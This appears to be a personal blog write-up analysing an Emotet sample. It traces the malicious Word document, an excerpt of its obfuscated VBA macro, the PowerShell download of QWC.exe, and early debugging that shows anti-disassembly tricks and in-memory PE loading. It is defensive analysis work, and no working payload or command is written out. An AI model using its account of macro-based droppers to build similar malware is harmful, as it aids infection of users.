I recently completed reading the book Practical Malware Analysis. The book provided some great sample exercises to work with. But now I wanted to try some real world malware samples. So I decided to take on one of the fashionable malware running around during the time of writing this article, the Emotet malware.

Delivery

After some initial research I discovered that the malware is usually distributed via email phishing attack. This sample however was downloaded through a compromised Nepalese site, another preferred delivery method. You can visit https://urlhaus.abuse.ch/browse/tag/emotet/ for other sites that is used for the malware delivery. The site delivered a Microsoft word document.

Sites compromised for emotet delivery

Initial Static and Dynamic Analysis

Since it was a word document, I guessed it would use macros to execute commands. I used the python olevba.py tool to check if it contained any macros, … and indeed it did. The following is the sample output:

Function YTHiNRwPXuc()

Const sUwiRoCWWnD = 887149054–887149054

Dim GsjiwB, CZXRTwT, CbMFvawK, IhLVB

CZXRTwT = Len(zVAznGfV)

IhLVB = “”

For GsjiwB = 1 To CZXRTwT

IhLVB = IhLVB & (15 + ((CbMFvawK + 33) Mod 124))

— — — — — — — — — OUTPUT OMITTED — — — — — —

The code seemed obfuscated the the tool itself confirmed my suspicion.

Olevba.py output

We can see that there are many hex/base64 encoded strings. Also, the macro executes as soon as the word document is opened. To run dynamic analysis for the macro code, I used the python VMmonkey tool. It displayed that the malware used shell to execute commands.

Shell execution

I suspected that the shell command would download additional payload, so I executed the word document with macro enabled and observed the network traffic via fiddler. The macro executes a powershell command to download the payload. (Enlarge the image below)

Powerhsell script execution

I monitored the hard disk for any new file downloaded using FolderChangesView, and found out that the macro downloaded a file named QWC.exe.

New payload downloaded

I analysed the malware sample with CFF explorer, and I did not find much interesting information The file did however had imports and claimed that Mirosoft had the legal copyright. LOL.

Coff explorer

Code Reversing and Debugging

I loaded the malware in IDA and found that it imported some APIs like GetCommandLineA(), GetCommandLineA() ….. While running the code however, I noticed that the malware does some anti reverse engineering tricks. Some code were actually treated as data and tricked the Disassemblers until executed.

Anti Reverse Engineering

After some debugging I observed that the malware allocates some memory and loads an actual PE image into that memory.